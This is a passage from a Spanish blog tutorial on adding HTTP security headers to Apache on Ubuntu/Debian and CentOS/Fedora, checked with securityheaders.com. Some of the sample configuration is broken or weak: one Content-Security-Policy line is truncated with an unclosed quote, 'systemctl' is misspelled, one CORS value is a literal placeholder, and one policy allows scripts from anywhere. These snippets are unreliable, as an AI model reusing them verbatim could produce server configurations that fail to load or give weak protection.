<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 301px; overflow: hidden; width: 567px;"><img height="301" src="https://lh6.googleusercontent.com/5YAGdtqPl7Y9rvLAvUeoxjFSHFZsfZ3qa6OU4ryojuDN8WJOUOhodEPj9HPV5gV0vrwFWyTp1U-tJ4bEZ5DH4EXT6hHrEoNmRsxLUShZlMlrkOWU9vkVtQgI2xtgfvmVIC1i2bQ" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Si queremos además, podemos despistar a posibles atacantes cambiando la respuesta para que en vez de en </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">blanco, responda con la respuesta que nosotros queramos, como por ejemplo en este caso Red-Hat.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 299px; overflow: hidden; width: 567px;"><img height="299" src="https://lh6.googleusercontent.com/3tjcLos5OeYpJzgxLCZjF7phnOlOtAmeBMZhwLIxMSA63dVBtKzb1yEX6oOp9VPgPadaxRThifINSImuZE3tEbM0K-mPIrHwU-jTtM3slVPaor51-LmO7n36TuiDRheEgDvv2eo" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ahora si volvemos a comprobar el estado de las cabeceras en </span><a href="https://securityheaders.com/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://securityheaders.com/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> veremos cómo </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">hemos aumentado la nota.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 365px; overflow: hidden; width: 567px;"><img height="365" src="https://lh3.googleusercontent.com/TQTtCl-WeQdE3WXu9BYyY3_wOF2I42BwpPwnUFQw1qXt3Gwpf5wC_WsFhCmzOfMjgJ-LF0mLzjcAY3ZDxsO-4dPNDJbtMfcvBHMe4FcKHD1j-RgMEL4W1UBtIxgq76Ci0kt_4eo" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Si nos dirigimos al análisis de las cabeceras podremos comprobar dos cosas, una es la respuesta del server en la </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">que ahora aparece “red-hat” y la otra es la cabecera Strict-Transport-Security que aparece marcada en rojo, </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">esto es debido a que la plataforma web no tiene ningún certificado ssl instalado y por eso falla.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">En un futuro artículo explicaremos cómo instalar certificados SSL, tanto en Apache2 como en IIS.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 280px; overflow: hidden; width: 567px;"><img height="280" src="https://lh5.googleusercontent.com/V5dV7sKcqupkCatYadc5c0duh6_0CtuT61fvWHACsDVw8TRWIX4YL8JjhswdH8Cv5KyP2ZwjUvWZvE_wZ8dkNEZN-2DdDfiba0amvP4ZESxrNdrxs0PZkmuS1B6jRKjgSi0B6Uk" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div class="MsoNormal">
<b style="font-weight: normal;"><br /></b></div>
<h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: #2e75b5; font-family: "calibri" , sans-serif; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">¿Cómo configurar las cabeceras en Ubuntu – Debian?</span></h1>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Configurar las cabeceras de seguridad en sistemas Linux de la rama de Ubuntu/Debian es relativamente sencillo,</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> la única dificultad es que hay que activar un módulo de seguridad en apache2 para que podamos configurar las</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> cabeceras de forma correcta.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Lo primero que haremos será ejecutar el comando </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">a2enmod headers</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> y reiniciar el servicio mediante systemctl </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">restart apache2 para que los cambios surtan efecto.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ahora nos dirigiremos a /etc/apache2/mods-enabled/ y crearemos con nuestro editor de texto favorito el archivo</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">headers.conf.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Rellenamos el archivo headers.conf con las siguientes líneas:</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 1pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><IfModule mod_headers.c></span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header unset X-Powered-By </span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header always unset X-Powered-By</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header always append X-Frame-Options: SAMEORIGIN</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header add Strict-Transport-Security: "max-age=631138519; includeSubDomains"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header set X-XSS-Protection: "1; mode=block"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header set X-Content-Type-Options: "nosniff"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header always set X-Content-Security-Policy "default-src 'self'; img-src 'self$</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header set Content-Security-Policy "default-src 'self'"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header set Referrer-Policy "same-origin"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header set Feature-Policy "vibrate 'self' cabeceras2.honeysec.info"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Header set Content-Security-Policy "upgrade-insecure-requests"</span></div>
<div dir="ltr" style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; padding: 0pt 4pt 1pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"></IfModule></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Por último deberemos editar el archivo /etc/apache2/apache2.conf y al final del archivo escribiremos: </span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 1pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ServerSignature Off</span></div>
<div dir="ltr" style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; padding: 0pt 4pt 1pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ServerTokens Prod</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Volvemos a reiniciar el servicio mediante el comando: sytemctl restart apache2 para que se apliquen los cambios</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> y nos dirigirnos a: </span><a href="https://securityheaders.com/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://securityheaders.com/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> para comprobar la puntuación de nuestra web.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 364px; overflow: hidden; width: 567px;"><img height="364" src="https://lh5.googleusercontent.com/r-LEv0JgEK7XdGXO_vPLKFl6WZbVluwT0ZLHOtyLJVkIQLMVjlWsDjR0v11RqiXjIImt4CciR2N93yZdToxKgEojSIpaI-t5s4HqRgWNtgnihtx-iV7xSkbyG24QPm5dRr_3Jdo" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 228px; overflow: hidden; width: 567px;"><img height="228" src="https://lh6.googleusercontent.com/8143dSARMmA9n9JUry5Vb45bGvHXacrQL0AYSh_jk9I19oDiZjiDBGufQrfqh33OBLG8Aij8QBXVdClhDoqyd8OOeFRB17OlX29ai-uCXBz4ioIyNtDj339tI9UE2s_jstjlmPA" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: #2e75b5; font-family: "calibri" , sans-serif; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">¿Cómo configurar las cabeceras en CentOS – Fedora?</span></h1>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Configurar las cabeceras de seguridad en sistemas Linux de la rama de CentOS y Fedora es muy sencillo, basta </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">con usar nuestro editor de texto favorito, acceder al archivo de configuración /etc/httpd/conf/httpd.conf y </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">añadir las cabeceras deseadas. Un ejemplo que podéis establecer puede ser el siguiente:</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 1pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><IfModule mod_headers.c></span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> <Directory /></span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Header always set X-XSS-Protection "1; mode=block"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Header always set x-Frame-Options "SAMEORIGIN"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Header always set X-Content-Type-Options "nosniff"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Header always set Content-Security-Policy "default-src 'self'; font-src *;img-src * data:; script-src *; style-src *;"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Header always set Referrer-Policy "strict-origin"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Header always set Feature-Policy "vibrate 'self' cabeceras1.honeysec.info"</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Header set Access-Control-Allow-Origin 'origin-list'</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> ServerSignature Off </span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> ServerTokens Prod </span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </Directory></span></div>
<div dir="ltr" style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; padding: 0pt 4pt 1pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"></IfModule></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Por último deberemos editar el archivo /etc/httpd/httpd.conf y al final del archivo escribiremos: </span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 1pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ServerSignature Off</span></div>
<div dir="ltr" style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; padding: 0pt 4pt 1pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ServerTokens Prod</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Bastaría con reiniciar el servicio mediante el comando: sytemctl restart httpd y dirigirnos a: </span><br />
<a href="https://securityheaders.com/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://securityheaders.com/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> para comprobar la puntuación de nuestra web.</span></div>
<div class="MsoNormal">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Sin más me despido, espero que os sirva para endurecer vuestros servidores web y que aumente el nivel de </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">seguridad en todos los sistemas TI.</span></div>
<div class="MsoNormal">
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Un saludo. </span></div>
<div>
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com019114 Mazuecos, Guadalajara, Spain40.2634313 -3.011316599999986540.2573728 -3.0214015999999866 40.2694898 -3.0012315999999863tag:blogger.com,1999:blog-4789894782637921835.post-34282841381701876572020-02-04T14:32:00.000+01:002020-02-04T14:32:39.923+01:00JASYP19 - Challenges - Reversing 1<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB2XfvrLJZkVu5q6A2Hxhr6gJm1nQUnsb8Qyz8aofcN_wUqwMEIdhpkLVxSSLFZIQFBFuxvlDIczfe-a81Pu8GmCLfEeJ3nfw99hZaty7PLj-g-8B5xomG8fCNsSala5bEwcHonX8Oj0NC/s1600/IVAN.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="138" data-original-width="815" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB2XfvrLJZkVu5q6A2Hxhr6gJm1nQUnsb8Qyz8aofcN_wUqwMEIdhpkLVxSSLFZIQFBFuxvlDIczfe-a81Pu8GmCLfEeJ3nfw99hZaty7PLj-g-8B5xomG8fCNsSala5bEwcHonX8Oj0NC/s640/IVAN.PNG" width="640" /></a></div>
